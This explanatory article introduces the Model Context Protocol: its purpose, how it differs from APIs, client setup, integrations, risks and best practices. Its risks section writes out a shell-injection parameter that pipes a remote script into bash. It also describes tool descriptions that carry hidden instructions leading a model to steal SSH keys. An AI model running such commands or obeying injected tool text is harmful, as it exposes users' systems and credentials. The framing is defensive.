Do you remember the moment when USB-C eliminated the cable chaos? Whether hard disk, monitor or smartphone: one plug is enough these days. Since the end of 2024, the AI world has been experiencing the same aha effect at data and tool level: the Model Context Protocol (MCP) provides the universal connection via which AI language models can retrieve structured information from other tools and thus execute actions.
Before MCP appeared, each team wrote their own scripts for each data source and laboriously linked them to an LLM. Today, we do the job once according to the protocol and every model can get started. In this article, you will find out why we need MCP servers, how they work, where they already help today, but also what risks you should be aware of.
What is MCP and where does the term come from?
"MCP" stands for "Model Context Protocol". An MCP server acts as an interpreter between a large language model (LLM) and the programs, databases and services of your tech stack - e.g. HubSpot or Notion.
The protocol originated at Anthropic, which published an initial open-source reference implementation on GitHub on November 25, 2024. Just a few months later, OpenAI, Google and Microsoft (Azure AI Foundry) integrated MCP into their agent frameworks. An MCP server provides the language model with structured context and translates its responses into specific commands. Instead of just moving text back and forth, the model now says create_branch, start_vm or send_invoice, and the server executes the order in the appropriate system.
Example - your online store
Let's assume you have an online store. In the backend, you define which commands the store accepts (e.g. get_order, create_client, etc.). Any MCP-enabled AI can then create orders, adjust deliveries or send invoices without you having to add a single line of SDK code. If you later switch to a new model or change your cloud provider, the interface remains unchanged: the server continues to speak the same "language" and protects you from breaking changes.
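To make this concrete, here is a minimal sketch of what such a tool declaration might look like on the server side. The tool names come from the store example above; the schema fields are simplified illustrations, not the exact MCP wire format (the real protocol describes inputs with JSON Schema over a JSON-RPC transport):

```python
# Illustrative tool manifest for the store example - simplified field
# names, not the literal MCP schema.
STORE_MANIFEST = {
    "tools": [
        {
            "name": "get_order",
            "description": "Fetch one order by its numeric ID.",
            "parameters": {"order_id": "integer"},
        },
        {
            "name": "create_client",
            "description": "Create a new customer record.",
            "parameters": {"name": "string", "email": "string"},
        },
    ]
}

def is_allowed(tool_name: str) -> bool:
    """The server only executes tools that the manifest declares."""
    return any(t["name"] == tool_name for t in STORE_MANIFEST["tools"])
```

The point of the manifest is exactly this allowlist behavior: a tool the manifest does not declare simply does not exist for the model.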
The fact that we did not need such a level until now was simply due to the fact that for a long time language models only generated texts. It was only when agent concepts became popular that expectations rose: If the model already knows what to do, why is a human still clicking? MCP closes this gap. Thanks to the MCP server, an AI can now also perform actions in external tools. At the same time, you retain control because the manifest specifies which commands are permitted, which parameters remain valid and when the model asks questions.
Analogy from real life
Imagine you have a personal assistant who speaks the "language" of various institutions - tax office, tax consultant, banks. They know the telephone numbers, the contact persons and your information. Instead of you having to deal with each individual institution, your assistant can do it for you.

The institutions here are your external tools (HubSpot, Xano, Notion, etc.). If these tools have an MCP server, any MCP-capable AI can communicate with them without you having to "teach" the AI the API documentation of each tool.
MCP vs. API: Differences and similarities
You might be wondering: "Is MCP simply a REST API?" An API, short for "Application Programming Interface", defines precise paths: GET /contacts/1242 returns the data of the customer with ID 1242, while POST /orders creates a new order. It is a direct communication channel for developers and transports only raw data. An MCP server goes further: it explains to the language model when and why this data is important, offers the appropriate tool, and immediately incorporates the result into the model's response.
Both approaches move data from one system to another and often use the same endpoints. An MCP server therefore calls up the same route, extracts the response and continues working with it. This is where the similarities end.
An API provides individual functions without worrying about their context. The MCP server, on the other hand, not only provides the language model with raw data, but also classifies it, assigns parameters to it and determines which steps are possible next. Its manifest describes which tools the model is allowed to call, which inputs are valid and when it should ask for clarification.
Let's assume your store backend offers GET /orders/123. The MCP server pulls this order, forms a context document from it and sends it to the model. If the customer asks: "Can you change my delivery to express?", the model recognizes that it is about order 123, selects the update_shipment tool and passes the parameters for express delivery. The server then calls POST /shipments/express, checks the response and formulates an understandable confirmation for the customer. The REST API remains the stable data provider, the MCP server ensures that the language model understands the information and executes the desired action in one go.
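The round trip described above can be sketched in a few lines. Everything here is illustrative: the endpoint paths follow the example, and http() is a stand-in for a real HTTP client:

```python
# Sketch of the round trip: tool call in, REST call out, confirmation back.
# The routes and the http() stand-in are illustrative assumptions.
def http(method: str, path: str, body=None) -> dict:
    """Stand-in for a real HTTP client; returns canned responses."""
    if method == "GET" and path == "/orders/123":
        return {"id": 123, "shipment": "standard"}
    if method == "POST" and path == "/shipments/express":
        return {"ok": True, "order_id": body["order_id"]}
    raise ValueError(f"unknown route {method} {path}")

def handle_tool_call(tool: str, params: dict) -> str:
    """What the MCP server does when the model picks a tool."""
    if tool == "update_shipment" and params.get("mode") == "express":
        order = http("GET", f"/orders/{params['order_id']}")
        result = http("POST", "/shipments/express", {"order_id": order["id"]})
        if result["ok"]:
            return f"Order {order['id']} has been switched to express delivery."
    return "Sorry, I could not perform that action."
```

The REST API stays a dumb data provider; all the "understanding" (which tool, which parameters, what to tell the customer) lives in the layer above it.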

How do you use MCP? And how should you use it?
An MCP server gives your AI two basic abilities: acting and understanding. First, the agent can independently send emails, update database entries or create a Google Doc without any additional scripts. At the same time, the server connects the language model with your tech stack so that CRM data, ERP bookings or Confluence articles are incorporated as structured context. This creates answers that are technically correct and can be written directly back into the system if required. Only share the tools that are really necessary, validate each input carefully and log all actions transparently. In this way, automation and governance run harmoniously together while you retain an overview at all times.
How and where can you set up an MCP server?
An MCP system always consists of a server that offers tools and a client that uses these tools. One of the first and most popular clients is Claude Desktop, which is offered by Anthropic, the inventor of MCP. As it runs as a local program on your Windows or macOS computer, it can also interact with local environments, such as the file system. To do this, open "File → Settings → Developer → Edit configuration", insert the quick-start snippet for your desired server and save. After restarting the app, a tool icon appears below the input field; commands such as "create folder reports 2025" are now executed directly as a tool call. Even with local MCP setups there are exciting possibilities, and you can drive programs you have never used before, for example the 3D modeler Blender.
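For reference, the quick-start snippet for Anthropic's filesystem server looks roughly like this in the configuration file (the directory path is a placeholder you adapt to your own machine):

```json
{
  "mcpServers": {
    "filesystem": {
      "command": "npx",
      "args": [
        "-y",
        "@modelcontextprotocol/server-filesystem",
        "/Users/you/Desktop"
      ]
    }
  }
}
```

Each entry under "mcpServers" names one server and the command Claude Desktop uses to launch it locally.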
Alternatively, you can also connect remote servers via SSE. If you want to connect a hosted server, enter its URL in the same view or via the command claude mcp add --transport sse .... SSE (Server-Sent Events) uses a simple, permanently open HTTP connection over which the server immediately streams its responses to the client. You can find such servers in various directories, for example on mcp.so, where more than 15,000 servers are now listed, filterable by category and popularity. Things are a little more curated at mcpservers.org.
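The SSE format itself is simple: events arrive as "data:" lines, separated by blank lines. A minimal, simplified parser sketch (real clients handle more of the spec, such as event names, IDs and retry fields):

```python
def parse_sse(stream: str) -> list:
    """Collect the payload of each SSE event.

    Events are separated by a blank line; payload lines start with
    'data:'. Multi-line payloads are joined with newlines, as the
    SSE specification requires.
    """
    events, buffer = [], []
    for line in stream.splitlines():
        if line.startswith("data:"):
            buffer.append(line[5:].lstrip())
        elif line == "" and buffer:
            events.append("\n".join(buffer))
            buffer = []
    if buffer:  # stream ended without a trailing blank line
        events.append("\n".join(buffer))
    return events
```

This is why SSE is such a low-friction transport: one long-lived HTTP response, plain text framing, no special client library strictly required.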
For web UIs such as ChatGPT, Gemini or Perplexity, the Chrome plugin MCP SuperAssistant is available. After installation, start a small local proxy server with npx @srbhptl39/mcp-superassistant-proxy@latest --config ./mcpconfig.json. If you activate the MCP button in the plugin, a sidebar shows all available tools; you can select whether calls should run automatically or be confirmed manually.
If you prefer to work only in the browser, you might want to try Runner H. In the "MCPS" menu, you can connect Google services, Notion, Slack or Zapier actions in just a few clicks via OAuth login - unfortunately, the selection of available services is still quite limited. In chat, type @tool: followed by your task, such as adding a new line in Google Sheets, and Runner H executes the task and logs the result.
Development environments now also include MCP support. In Cursor IDE you create project-related servers under "MCP Servers", in Windsurf you will find the same function in the settings. This allows agents to start tests, read logs or initiate deploy tasks while you continue to work on the code.
You can also integrate existing automations via the Make or Zapier MCP servers. Make turns any "on demand" scenario into an MCP tool that your client addresses via an SSE URL provided by Make. Zapier creates its own endpoint URL with one click, opening up access to thousands of apps without the need for further integration work.
4 application scenarios that are already running today
- Webflow: The official MCP server gives your agent live access to sites, collections and CMS fields. This allows you to create new blog posts, update SEO titles or trigger releases without having to maintain your own integration scripts.
- Wix Studio: The hosted server covers eCommerce, Bookings, Payments, Blog, CMS and CRM. After a one-off OAuth setup, an AI can update products, adjust prices or create events while remaining in the secure Wix cloud.
- Figma Dev Mode: If you activate the local MCP server, Figma delivers variables, component IDs and layout dimensions directly to your code agent. This results in clean React or Tailwind code that automatically complies with design system specifications.
- Airtable: The open source project airtable-mcp-server provides tools such as list_records, search_records and create_record. A personal access token is sufficient for the agent to search tables, generate reports or create new data records.
What dangers can MCP servers harbor?
Wherever data flows, risks lurk - and MCP servers are a particularly tempting target because they stand between models and company systems. If someone gets hold of your access token, they can control every connected tool. Security researchers found insecure shell calls in over forty percent of the implementations tested; a seemingly harmless parameter such as ; curl evil.sh | bash is then sufficient for remote code execution. Another research team also showed how commands can be hidden in the description text of a tool: The model reads the hidden instruction, secretly copies SSH keys and nobody notices the theft. Danger remains even after installation, as tools can change their own definition and later forward requests to a foreign server without being noticed. In environments with several servers, a manipulated copy can intercept the calls of a trusted one and falsify the responses.
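The shell-injection pattern mentioned above is easy to avoid. A sketch with an invented ping-style tool helper: validate the model-supplied parameter and build an argument list for subprocess.run(..., shell=False) instead of interpolating it into a shell string:

```python
import re

# Conservative allowlist for hostnames: letters, digits, dots, hyphens.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

def build_ping_command(host: str) -> list:
    """Hypothetical MCP tool helper that builds a ping command.

    A vulnerable implementation would interpolate into a shell string,
    e.g. f"ping -c 1 {host}" with shell=True - then a parameter like
    "; curl evil.sh | bash" runs arbitrary code. Validating the input
    and returning an argument list (to be passed to subprocess.run
    with shell=False) removes that possibility.
    """
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected suspicious host parameter: {host!r}")
    return ["ping", "-c", "1", host]
```

With an argument list, the parameter is only ever data, never part of a command, and the regex rejects the injection payload outright.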
Even without an active attack, there is a risk of leaks if the server transmits context packets unencrypted or logs them in plain text. Customer or health data must not appear in logs or in prompt histories. In addition, large language models like to invent functions; if the model suddenly requests delete_database, the server must block and trigger an alarm.
These vulnerabilities arise because the specification places convenience above security: it does not require authentication, encryption or proof of integrity. Microsoft responds with a curated registry, requires strict login and shows consent prompts for risky actions. Anthropic recommends treating every model as untrusted, as if every prompt came from an anonymous stranger on the Internet.
Best practices for your MCP use
- Fine-grained authorizations (least privilege principle): Only grant the MCP server and each tool the rights that are currently absolutely necessary. Let write or admin scopes expire automatically so that superfluous access does not become an attack vector.
- Authentication and authorization: Protect all endpoints with multi-factor authentication; tokens are short-lived, strictly limited and are immediately rotated in the event of anomalies. A stolen token thus becomes worthless before any damage is done.
- Monitoring and auditing: Record all interactions in encrypted form and analyze them in real time. Alarms for anomalies - for example mass update_record in seconds - stop attacks at an early stage.
- Prompt engineering and guardrails: Clearly define in the manifest which commands are permitted and force the model to ask for clarification if anything is unclear. Guardrails block hallucinated or injected calls such as delete_database.
- Error handling: Implement routines that recognize unreachable tools or incorrect responses, log the incident and abort the workflow in a controlled manner. This keeps processes transparent and recoverable.
- Documentation and versioning: File each manifest in version control and subject changes to peer review. Precise documentation describes expected inputs, outputs and security rules so that all team members can understand the deployment.
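Several of these practices (least privilege, guardrails, auditing) fit into one small gatekeeper. A minimal sketch using an invented allowlist and standard logging, not a real MCP SDK API: every call is checked against the manifest, unknown tools and parameters are blocked, and every decision is logged:

```python
import json
import logging

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("mcp-audit")

# Hypothetical manifest: tool name -> set of permitted parameters.
ALLOWED_TOOLS = {
    "get_order": {"order_id"},
    "update_record": {"record_id", "fields"},
}

def guard_tool_call(tool: str, params: dict) -> bool:
    """Allow a call only if tool and all parameters are in the manifest."""
    entry = ALLOWED_TOOLS.get(tool)
    if entry is None:
        log.warning("blocked hallucinated/forbidden tool: %s", tool)
        return False
    unknown = set(params) - entry
    if unknown:
        log.warning("blocked %s: unexpected parameters %s", tool, sorted(unknown))
        return False
    log.info("audit: %s %s", tool, json.dumps(params, sort_keys=True))
    return True
```

A hallucinated call such as delete_database fails the first check, an injected extra parameter fails the second, and every outcome leaves an audit trail.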
Conclusion
MCP brings order to today's patchwork of one-off integrations. A single manifest describes which tools a model may use, and a server provides them in a structured form. This eliminates the maintenance effort for dozens of special scripts, while authorizations remain clear and verifiable. However, this simplification does not come for free. If you want to run an MCP server in production, you have to model the manifest cleanly, secure the server against unauthorized access, log every call without gaps and store sensitive log data in encrypted form.
This effort is worthwhile because the protocol is quickly gaining acceptance. Major providers such as Anthropic, Google, Microsoft and various developer tools have already integrated or announced MCP, and others are likely to follow. Those who start their first pilot projects now will build up expertise as the standard becomes established, giving them a real head start.
Consistent data protection remains crucial. Only transfer confidential information if it is essential for the task, keep tokens to the smallest possible functional scope and delete or anonymize logs within clearly defined deadlines. If this responsible approach is successful, MCP provides a reliable basis for bringing AI automation safely into everyday working life and keeping every action traceable.